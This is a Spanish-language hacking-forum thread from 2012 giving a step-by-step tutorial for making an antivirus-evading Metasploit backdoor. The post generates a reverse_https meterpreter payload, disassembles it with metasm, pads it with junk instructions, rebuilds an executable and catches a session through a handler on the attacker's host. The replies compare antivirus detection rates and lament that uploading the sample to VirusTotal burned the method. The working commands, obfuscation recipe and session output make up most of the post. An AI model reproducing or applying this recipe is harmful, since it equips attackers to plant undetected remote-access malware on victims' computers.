comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

  • 11 Respuestas
  • 5625 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« en: Noviembre 12, 2012, 02:32:55 pm »
Normalmente crear un backdoor con Metasploit es sinónimo de detección por parte de la mayoría de AV, incluso utilizando el encoder polimórfico shikata_ga_nai.

El siguiente método que vamos a ver en esta entrada se denomina Assembly Ghost writing y consiste en modificar un binario malicioso reescribiendo el código ensamblador del payload del exploit generado con Metasploit.

El resultado es un fichero FUD (completamente indetectable), o al menos con un ratio bajo de detección, por medio del cual un atacante podría obtener una sesión en la máquina de la víctima de forma silenciosa.

En nuestras pruebas utilizaremos BT5R3 con metasploit v4.5.0-dev (atacante) y Win7 con AV McAfee (víctima). El procedimiento es muy sencillo:

1º Creamos el ejecutable malicioso en formato con msfpayload.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@bt:/home/pruebas# msfpayload windows/meterpreter/reverse_https LHOST=192.168.249.128 LPORT=443 R > binario.raw
root@bt:/home/pruebas# file binario.raw
binario.raw: data

2º Preparamos metasm (No tienes permisos para ver links. Registrate o Entra con tu cuenta)

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@bt:/home/pruebas# cd /opt/metasploit/msf3/lib/metasm
root@bt:/opt/metasploit/msf3/lib/metasm# cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3º Desensamblamos el fichero binario:

root@bt:/home/pruebas# ruby /opt/metasploit/msf3/lib/metasm/samples/disassemble.rb raw_binary > codigo.asm

4º Ofuscamos manualmente el código, desde esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
// Xrefs: 8dh
loc_15h:
    mov esi, [edx+28h]                           ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]                ; @18h  0fb74a26  r2:unknown
    xor edi, edi                                 ; @1ch  31ff

a esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
// Xrefs: 8dh
loc_15h:
    mov esi, [edx+28h]                ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]        ; @18h  0fb74a26  r2:unknown
    mov edi, ecx                ; Move the contents of the ECX register into the EDI Register
    push edi                    ; Push the EDI register onto the current stack frame
    pop edi                    ; Pop it back off
    mov edi, ecx                ; Mov ECX back into edi
    xor ecx, ecx                ; Zero out the contents of the ECX register
    mov ecx, edi                ; Mov EDI back into ECX
    xor edi, edi                ; @1ch

y añadimos al principio del fichero:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
.section '.text' rwx
.entrypoint

5º Construimos el ejecutable y lo empaqueamos a un formato que Windows pueda ejecutar:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@bt:/home/pruebas# ruby /opt/metasploit/msf3/lib/metasm/samples/peencode.rb codigo.asm -o carga.exe
saved to file "carga.exe"
root@bt:/home/pruebas# file carga.exe
carga.exe: MS-DOS executable, MZ for MS-DOS

6º Lanzamos la consola de Metasploit con el multi/handler:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@bt:/home/pruebas# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_https LHOST=192.168.249.128 LPORT=443 E
[*] Please wait while we load the module tree...

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[-] The value specified for PAYLOAD is not valid.
LHOST => 192.168.249.128
LPORT => 443
[*] Started reverse handler on 192.168.249.128:443
[*] Starting the payload handler...

7º Y finalmente ejecutamos carga.exe en el equipo Windows:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
[*] Sending stage (752128 bytes) to 192.168.249.1
[*] Meterpreter session 1 opened (192.168.249.128:443 -> 192.168.249.1:54402) at 2012-11-08 10:44:00 -0500
meterpreter > getuid
Server username: PANDORA\vmotos
meterpreter >

Fuente: hackplayers

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #1 en: Noviembre 13, 2012, 01:15:00 am »
me funciono bien  ;D en virustotal dice que solo 2 AV lo detectan!

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« Respuesta #2 en: Noviembre 13, 2012, 10:06:14 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
me funciono bien  ;D en virustotal dice que solo 2 AV lo detectan!
Por que lo subiste a virus total !!! por que wn por que?  xDDDDDD :facepalm:

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #3 en: Noviembre 13, 2012, 11:41:42 pm »
 :'( pero tenia ke ver si funcionaba poh wn!!

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« Respuesta #4 en: Noviembre 15, 2012, 07:31:00 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
:'( pero tenia ke ver si funcionaba poh wn!!
a la proxima que quieras saber que AV detecta a algo utiliza No tienes permisos para ver links. Registrate o Entra con tu cuenta u otro analizador online que no envie muestras a los AV, cuando escaneastes el .exe en Virustotal, lo que haces indiectamente enviaste muestras a toda la lista de AV's que estan en Virus Total. :'(

Desconectado Dr__Nesto

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Noviembre 15, 2012, 09:22:27 pm »
waaaaaaaa :( asesinaste este sencillo metodo de indetectar ;( NO ANALIZAR EN VIRUS TOTAL, Es algo que paso a ser una REGLA DE ORO en este mundo en los ultimos 3 años...

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #6 en: Noviembre 16, 2012, 12:24:27 am »
puta la wea!  :-[ perdonenme! es que no sabia  :'(

Desconectado Diabl0

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Noviembre 19, 2012, 01:03:46 am »
ni pex, ya jodieron el metodo :'(

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #8 en: Noviembre 19, 2012, 01:31:27 am »
esto significa que no lo detectan los av?  :-X

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #9 en: Noviembre 19, 2012, 10:01:30 am »
Asi es, es indetectable, en donde lo scanneaste?


Desconectado Diabl0

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Noviembre 19, 2012, 04:19:52 pm »
no hizo falta escanearlo, en cuanto pase el ejecutable a mi maquina virtual el avira lo detecto como: TR/Crypt.XPACK.Gen

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #11 en: Noviembre 20, 2012, 12:25:34 am »
lo analize en  No tienes permisos para ver links. Registrate o Entra con tu cuenta ayer

 

¿Te gustó el post? COMPARTILO!



[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 4573
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 1986
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 4302
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2122
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 1812
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX